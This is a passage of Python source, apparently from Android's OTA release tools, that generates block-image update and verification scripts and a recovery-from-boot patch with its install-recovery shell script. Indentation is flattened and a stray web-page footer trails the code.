script.AppendExtra((
'ifelse (block_image_recover("{device}", "{ranges}") && '
'block_image_verify("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat"), '
'ui_print("{partition} recovered successfully."), '
'abort("E{code}: {partition} partition fails to recover"));\n'
'endif;').format(device=self.device, ranges=ranges_str,
partition=partition, code=code))
# Abort the OTA update. Note that the incremental OTA cannot be applied
# even if it may match the checksum of the target partition.
# a) If version < 3, operations like move and erase will make changes
# unconditionally and damage the partition.
# b) If version >= 3, it won't even reach here.
else:
if partition == "system":
code = ErrorCode.SYSTEM_VERIFICATION_FAILURE
else:
code = ErrorCode.VENDOR_VERIFICATION_FAILURE
script.AppendExtra((
'abort("E%d: %s partition has unexpected contents");\n'
'endif;') % (code, partition))
def _WritePostInstallVerifyScript(self, script):
partition = self.partition
script.Print('Verifying the updated %s image...' % (partition,))
# Unlike pre-install verification, clobbered_blocks should not be ignored.
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True)))
# Bug: 20881595
# Verify that extended blocks are really zeroed out.
if self.tgt.extended:
ranges_str = self.tgt.extended.to_string_raw()
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str,
self._HashZeroBlocks(self.tgt.extended.size())))
script.Print('Verified the updated %s image.' % (partition,))
if partition == "system":
code = ErrorCode.SYSTEM_NONZERO_CONTENTS
else:
code = ErrorCode.VENDOR_NONZERO_CONTENTS
script.AppendExtra(
'else\n'
' abort("E%d: %s partition has unexpected non-zero contents after '
'OTA update");\n'
'endif;' % (code, partition))
else:
script.Print('Verified the updated %s image.' % (partition,))
if partition == "system":
code = ErrorCode.SYSTEM_UNEXPECTED_CONTENTS
else:
code = ErrorCode.VENDOR_UNEXPECTED_CONTENTS
script.AppendExtra(
'else\n'
' abort("E%d: %s partition has unexpected contents after OTA '
'update");\n'
'endif;' % (code, partition))
def _WriteUpdate(self, script, output_zip):
ZipWrite(output_zip,
'{}.transfer.list'.format(self.path),
'{}.transfer.list'.format(self.partition))
ZipWrite(output_zip,
'{}.new.dat'.format(self.path),
'{}.new.dat'.format(self.partition))
ZipWrite(output_zip,
'{}.patch.dat'.format(self.path),
'{}.patch.dat'.format(self.partition),
compress_type=zipfile.ZIP_STORED)
if self.partition == "system":
code = ErrorCode.SYSTEM_UPDATE_FAILURE
else:
code = ErrorCode.VENDOR_UPDATE_FAILURE
call = ('block_image_update("{device}", '
'package_extract_file("{partition}.transfer.list"), '
'"{partition}.new.dat", "{partition}.patch.dat") ||\n'
' abort("E{code}: Failed to update {partition} image.");'.format(
device=self.device, partition=self.partition, code=code))
script.AppendExtra(script.WordWrap(call))
def _HashBlocks(self, source, ranges): # pylint: disable=no-self-use
data = source.ReadRangeSet(ranges)
ctx = sha1()
for p in data:
ctx.update(p)
return ctx.hexdigest()
def _HashZeroBlocks(self, num_blocks): # pylint: disable=no-self-use
"""Return the hash value for all zero blocks."""
zero_block = '\x00' * 4096
ctx = sha1()
for _ in range(num_blocks):
ctx.update(zero_block)
return ctx.hexdigest()
DataImage = blockimgdiff.DataImage
# map recovery.fstab's fs_types to mount/format "partition types"
PARTITION_TYPES = {
"yaffs2": "MTD",
"mtd": "MTD",
"ext4": "EMMC",
"emmc": "EMMC",
"f2fs": "EMMC",
"squashfs": "EMMC"
}
def GetTypeAndDevice(mount_point, info):
fstab = info["fstab"]
if fstab:
return (PARTITION_TYPES[fstab[mount_point].fs_type],
fstab[mount_point].device)
else:
raise KeyError
def ParseCertificate(data):
"""Parse a PEM-format certificate."""
cert = []
save = False
for line in data.split("\n"):
if "--END CERTIFICATE--" in line:
break
if save:
cert.append(line)
if "--BEGIN CERTIFICATE--" in line:
save = True
cert = "".join(cert).decode('base64')
return cert
def MakeRecoveryPatch(input_dir, output_sink, recovery_img, boot_img,
info_dict=None):
"""Generate a binary patch that creates the recovery image starting
with the boot image. (Most of the space in these images is just the
kernel, which is identical for the two, so the resulting patch
should be efficient.) Add it to the output zip, along with a shell
script that is run from init.rc on first boot to actually do the
patching and install the new recovery image.
recovery_img and boot_img should be File objects for the
corresponding images. info should be the dictionary returned by
common.LoadInfoDict() on the input target_files.
"""
if info_dict is None:
info_dict = OPTIONS.info_dict
full_recovery_image = info_dict.get("full_recovery_image", None) == "true"
system_root_image = info_dict.get("system_root_image", None) == "true"
if full_recovery_image:
output_sink("etc/recovery.img", recovery_img.data)
else:
diff_program = ["imgdiff"]
path = os.path.join(input_dir, "SYSTEM", "etc", "recovery-resource.dat")
if os.path.exists(path):
diff_program.append("-b")
diff_program.append(path)
bonus_args = "-b /system/etc/recovery-resource.dat"
else:
bonus_args = ""
d = Difference(recovery_img, boot_img, diff_program=diff_program)
_, _, patch = d.ComputePatch()
output_sink("recovery-from-boot.p", patch)
try:
# The following GetTypeAndDevice()s need to use the path in the target
# info_dict instead of source_info_dict.
boot_type, boot_device = GetTypeAndDevice("/boot", info_dict)
recovery_type, recovery_device = GetTypeAndDevice("/recovery", info_dict)
except KeyError:
return
if full_recovery_image:
sh = """#!/system/bin/sh
if ! applypatch -c %(type)s:%(device)s:%(size)d:%(sha1)s; then
applypatch /system/etc/recovery.img %(type)s:%(device)s %(sha1)s %(size)d && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'type': recovery_type,
'device': recovery_device,
'sha1': recovery_img.sha1,
'size': recovery_img.size}
else:
sh = """#!/system/bin/sh
if ! applypatch -c %(recovery_type)s:%(recovery_device)s:%(recovery_size)d:%(recovery_sha1)s; then
applypatch %(bonus_args)s %(boot_type)s:%(boot_device)s:%(boot_size)d:%(boot_sha1)s %(recovery_type)s:%(recovery_device)s %(recovery_sha1)s %(recovery_size)d %(boot_sha1)s:/system/recovery-from-boot.p && log -t recovery "Installing new recovery image: succeeded" || log -t recovery "Installing new recovery image: failed"
else
log -t recovery "Recovery image already installed"
fi
""" % {'boot_size': boot_img.size,
'boot_sha1': boot_img.sha1,
'recovery_size': recovery_img.size,
'recovery_sha1': recovery_img.sha1,
'boot_type': boot_type,
'boot_device': boot_device,
'recovery_type': recovery_type,
'recovery_device': recovery_device,
'bonus_args': bonus_args}
# The install script location moved from /system/etc to /system/bin
# in the L release. Parse init.*.rc files to find out where the
# target-files expects it to be, and put it there.
sh_location = "etc/install-recovery.sh"
found = False
if system_root_image:
init_rc_dir = os.path.join(input_dir, "ROOT")
else:
init_rc_dir = os.path.join(input_dir, "BOOT", "RAMDISK")
init_rc_files = os.listdir(init_rc_dir)
for init_rc_file in init_rc_files:
if (not init_rc_file.startswith('init.') or
not init_rc_file.endswith('.rc')):
continue
with open(os.path.join(init_rc_dir, init_rc_file)) as f:
for line in f:
m = re.match(r"^service flash_recovery /system/(\S+)\s*$", line)
if m:
sh_location = m.group(1)
found = True
break
if found:
break
print("putting script in", sh_location)
output_sink(sh_location, sh)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.